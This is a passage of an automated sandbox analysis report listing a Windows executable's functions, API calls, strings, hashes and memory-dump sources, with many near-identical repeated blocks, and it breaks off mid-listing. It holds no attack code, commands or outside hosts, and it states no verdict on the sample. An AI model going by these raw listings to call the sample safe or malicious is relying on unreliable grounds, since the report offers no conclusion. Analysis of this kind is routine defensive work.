                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID:
                                                                                  • API String ID: 1269201914-0
                                                                                  • Opcode ID: 7081dbea28d8f4c86a55de82020656d5231c3fcaeb022ee64a82f87ace259a10
                                                                                  • Instruction ID: 5672c8bc34f97693661d9fb613143d8b030524bee2e06c5b98e8ff2de7b703d2
                                                                                  • Opcode Fuzzy Hash: 7081dbea28d8f4c86a55de82020656d5231c3fcaeb022ee64a82f87ace259a10
                                                                                  • Instruction Fuzzy Hash: F5B012EA27A000BD3604F2045C02C3B020DC0C2F21331C02FF804D15C0DC804C340E33
                                                                                  Function 0028E3EF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E3FC
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID:
                                                                                  • API String ID: 1269201914-0
                                                                                  • Opcode ID: 1f975538bdd4a857353ba73315cf674378db4def1b911a559bf4b506d3e52253
                                                                                  • Instruction ID: 7af011b28a9442d9b066647399bb50488fb656948042e642081a0e139c443bc5
                                                                                  • Opcode Fuzzy Hash: 1f975538bdd4a857353ba73315cf674378db4def1b911a559bf4b506d3e52253
                                                                                  • Instruction Fuzzy Hash: 89A001EA2BA1527E3908B6516D06C3B021EC4C2F25332956EF825A58D1AC801C651E73
                                                                                  Function 0028E43C Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E3FC
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID:
                                                                                  • API String ID: 1269201914-0
                                                                                  • Opcode ID: e0130d0b698fceb32b821e5588262e1ca538f020b7c6605acac690ee896b397d
                                                                                  • Instruction ID: cd3dfa5dbb7fc607e73c6f1d2b50d4cfc9a70747fa6481fea85636cd61a3bbde
                                                                                  • Opcode Fuzzy Hash: e0130d0b698fceb32b821e5588262e1ca538f020b7c6605acac690ee896b397d
                                                                                  • Instruction Fuzzy Hash: AAA001EA2BA152BD3908B6516D06C3B021EC4C6F61332996EF816A58D1AC801C651E73
                                                                                  Function 0028E432 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E3FC
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID:
                                                                                  • API String ID: 1269201914-0
                                                                                  • Opcode ID: 434d95daae528c267f2307f955abf1866f52f0d1a1f27870d29cbf7d703c96d6
                                                                                  • Instruction ID: cd3dfa5dbb7fc607e73c6f1d2b50d4cfc9a70747fa6481fea85636cd61a3bbde
                                                                                  • Opcode Fuzzy Hash: 434d95daae528c267f2307f955abf1866f52f0d1a1f27870d29cbf7d703c96d6
                                                                                  • Instruction Fuzzy Hash: AAA001EA2BA152BD3908B6516D06C3B021EC4C6F61332996EF816A58D1AC801C651E73
                                                                                  Function 0028E40A Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E3FC
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID:
                                                                                  • API String ID: 1269201914-0
                                                                                  • Opcode ID: 20551cd780e9b41cb2dca775e77e516982893344087bb0ea7e7132306e12d059
                                                                                  • Instruction ID: cd3dfa5dbb7fc607e73c6f1d2b50d4cfc9a70747fa6481fea85636cd61a3bbde
                                                                                  • Opcode Fuzzy Hash: 20551cd780e9b41cb2dca775e77e516982893344087bb0ea7e7132306e12d059
                                                                                  • Instruction Fuzzy Hash: AAA001EA2BA152BD3908B6516D06C3B021EC4C6F61332996EF816A58D1AC801C651E73
                                                                                  Function 0028E414 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E3FC
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID:
                                                                                  • API String ID: 1269201914-0
                                                                                  • Opcode ID: 7bf3d1bb0c1a8f119ad65856932d5af18f9895dcaa7aa31f7edb511e95b7d0a4
                                                                                  • Instruction ID: cd3dfa5dbb7fc607e73c6f1d2b50d4cfc9a70747fa6481fea85636cd61a3bbde
                                                                                  • Opcode Fuzzy Hash: 7bf3d1bb0c1a8f119ad65856932d5af18f9895dcaa7aa31f7edb511e95b7d0a4
                                                                                  • Instruction Fuzzy Hash: AAA001EA2BA152BD3908B6516D06C3B021EC4C6F61332996EF816A58D1AC801C651E73
                                                                                  Function 0028E446 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E3FC
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID:
                                                                                  • API String ID: 1269201914-0
                                                                                  • Opcode ID: fee95354b2fa7719a93cef21c736d38f486e74ae8141b54e5925a891aea89824
                                                                                  • Instruction ID: cd3dfa5dbb7fc607e73c6f1d2b50d4cfc9a70747fa6481fea85636cd61a3bbde
                                                                                  • Opcode Fuzzy Hash: fee95354b2fa7719a93cef21c736d38f486e74ae8141b54e5925a891aea89824
                                                                                  • Instruction Fuzzy Hash: AAA001EA2BA152BD3908B6516D06C3B021EC4C6F61332996EF816A58D1AC801C651E73
                                                                                  Function 00279F09 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetEndOfFile.KERNELBASE(?,0027903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00279F0C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: File
                                                                                  • String ID:
                                                                                  • API String ID: 749574446-0
                                                                                  • Opcode ID: 0e5544ce5153cd29a6c237551b87c7e0497830d058b3e003e8f568a69e893324
                                                                                  • Instruction ID: c177b2776812ea5129f336b2592e73340b508bc7d0e6375f0bbec0adbe5641dc
                                                                                  • Opcode Fuzzy Hash: 0e5544ce5153cd29a6c237551b87c7e0497830d058b3e003e8f568a69e893324
                                                                                  • Instruction Fuzzy Hash: 5CA0113008000A8B8E002B30EA0800CBB20EB22BC030082A8A00ACA0A2CB22880B8A00
                                                                                  Function 0028AC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetCurrentDirectoryW.KERNELBASE(?,0028AE72,C:\Users\user\Desktop,00000000,002B946A,00000006), ref: 0028AC08
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: CurrentDirectory
                                                                                  • String ID:
                                                                                  • API String ID: 1611563598-0
                                                                                  • Opcode ID: 6c5dd739f9d39034095643e69f0c187938dcdba984342f1c25add09096f59d83
                                                                                  • Instruction ID: e76452bfbdb0ead033af27d4386d0a734e5a08071bd159f45c7269d45cb14f46
                                                                                  • Opcode Fuzzy Hash: 6c5dd739f9d39034095643e69f0c187938dcdba984342f1c25add09096f59d83
                                                                                  • Instruction Fuzzy Hash: 53A011302002008B8A008B32AF0AA0EBAAAAFA2B00F00C028B00880030CB30C820BA00
                                                                                  Function 00279620 Relevance: 1.3, APIs: 1, Instructions: 30COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CloseHandle.KERNELBASE(000000FF,?,?,002795D6,?,?,?,?,?,002A2641,000000FF), ref: 0027963B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseHandle
                                                                                  • String ID:
                                                                                  • API String ID: 2962429428-0
                                                                                  • Opcode ID: 80924f9817835bf789cf32032bc420c870564c0a0891674c3f9941e235b3e1f3
                                                                                  • Instruction ID: db20bd5bf5f4ffdf02ff44774c6cd0e022fa6827a32d9698499c40bf0a835883
                                                                                  • Opcode Fuzzy Hash: 80924f9817835bf789cf32032bc420c870564c0a0891674c3f9941e235b3e1f3
                                                                                  • Instruction Fuzzy Hash: 4BF0E9300A1B069FDB308E24C458792B7EC6B13321F049B1ED0EA429F0D770A6ED8A40

                                                                                  Non-executed Functions

                                                                                  Function 0028C220 Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 286timewindowfileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00271316: GetDlgItem.USER32(00000000,00003021), ref: 0027135A
                                                                                    • Part of subcall function 00271316: SetWindowTextW.USER32(00000000,002A35F4), ref: 00271370
                                                                                  • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0028C2B1
                                                                                  • EndDialog.USER32(?,00000006), ref: 0028C2C4
                                                                                  • GetDlgItem.USER32(?,0000006C), ref: 0028C2E0
                                                                                  • SetFocus.USER32(00000000), ref: 0028C2E7
                                                                                  • SetDlgItemTextW.USER32(?,00000065,?), ref: 0028C321
                                                                                  • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0028C358
                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 0028C36E
                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0028C38C
                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0028C39C
                                                                                  • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0028C3B8
                                                                                  • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0028C3D4
                                                                                  • _swprintf.LIBCMT ref: 0028C404
                                                                                    • Part of subcall function 00274092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002740A5
                                                                                  • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0028C417
                                                                                  • FindClose.KERNEL32(00000000), ref: 0028C41E
                                                                                  • _swprintf.LIBCMT ref: 0028C477
                                                                                  • SetDlgItemTextW.USER32(?,00000068,?), ref: 0028C48A
                                                                                  • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0028C4A7
                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0028C4C7
                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0028C4D7
                                                                                  • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0028C4F1
                                                                                  • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0028C509
                                                                                  • _swprintf.LIBCMT ref: 0028C535
                                                                                  • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0028C548
                                                                                  • _swprintf.LIBCMT ref: 0028C59C
                                                                                  • SetDlgItemTextW.USER32(?,00000069,?), ref: 0028C5AF
                                                                                    • Part of subcall function 0028AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0028AF35
                                                                                    • Part of subcall function 0028AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,002AE72C,?,?), ref: 0028AF84
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                                  • String ID: %s %s$%s %s %s$P($REPLACEFILEDLG
                                                                                  • API String ID: 797121971-1277811542
                                                                                  • Opcode ID: 1ed7cdcb144c73718a9b6c46d252a9b6ce589c610f9541f14a025879b9525843
                                                                                  • Instruction ID: 184f8e21067889650804901e4a755421ef8f587a05193d5705d22f876df26954
                                                                                  • Opcode Fuzzy Hash: 1ed7cdcb144c73718a9b6c46d252a9b6ce589c610f9541f14a025879b9525843
                                                                                  • Instruction Fuzzy Hash: A091A572559345BBE221EBA0DC4DFFB77ACEB4A700F00481AB649D20C1DB75EA148B72
                                                                                  Function 00276FAA Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 328fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00276FAA
                                                                                  • _wcslen.LIBCMT ref: 00277013
                                                                                  • _wcslen.LIBCMT ref: 00277084
                                                                                    • Part of subcall function 00277A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00277AAB
                                                                                    • Part of subcall function 00277A9C: GetLastError.KERNEL32 ref: 00277AF1
                                                                                    • Part of subcall function 00277A9C: CloseHandle.KERNEL32(?), ref: 00277B00
                                                                                    • Part of subcall function 0027A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,0027977F,?,?,002795CF,?,?,?,?,?,002A2641,000000FF), ref: 0027A1F1
                                                                                    • Part of subcall function 0027A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0027977F,?,?,002795CF,?,?,?,?,?,002A2641), ref: 0027A21F
                                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00277139
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00277155
                                                                                  • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00277298
                                                                                    • Part of subcall function 00279DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,002773BC,?,?,?,00000000), ref: 00279DBC
                                                                                    • Part of subcall function 00279DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00279E70
                                                                                    • Part of subcall function 00279620: CloseHandle.KERNELBASE(000000FF,?,?,002795D6,?,?,?,?,?,002A2641,000000FF), ref: 0027963B
                                                                                    • Part of subcall function 0027A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0027A325,?,?,?,0027A175,?,00000001,00000000,?,?), ref: 0027A501
                                                                                    • Part of subcall function 0027A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0027A325,?,?,?,0027A175,?,00000001,00000000,?,?), ref: 0027A532
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                                                                  • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                  • API String ID: 3983180755-3508440684
                                                                                  • Opcode ID: 78e4de3082f1a898b6aee081eb7d3c1c033b28bc7996486fd3360bc2f81a7e01
                                                                                  • Instruction ID: 3e8359c55adfe87ef9ab0b40feead4332726935ad75c4bc30a6785b62d9bf651
                                                                                  • Opcode Fuzzy Hash: 78e4de3082f1a898b6aee081eb7d3c1c033b28bc7996486fd3360bc2f81a7e01
                                                                                  • Instruction Fuzzy Hash: C4C1F871924615ABDB21EF74DC85FEEB3A8AF04300F00855AF95EE7182D770AA64CF61
                                                                                  Function 0029D8EE Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: __floor_pentium4
                                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                  • API String ID: 4168288129-2761157908
                                                                                  • Opcode ID: 2be93541ffc18d44f1a4eb9edf46145670dada0a15d3cb544455932c85c39d40
                                                                                  • Instruction ID: 799ba48fe9a46d88a58c1ea173f9fd8bf85819953cf42a3e9cad3d9d770f0036
                                                                                  • Opcode Fuzzy Hash: 2be93541ffc18d44f1a4eb9edf46145670dada0a15d3cb544455932c85c39d40
                                                                                  • Instruction Fuzzy Hash: BCC25A72E286298FDF25CE28DD407EAB7B5EB48305F1541EAD84DE7240E774AE918F40
                                                                                  Function 002732F7 Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 608COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
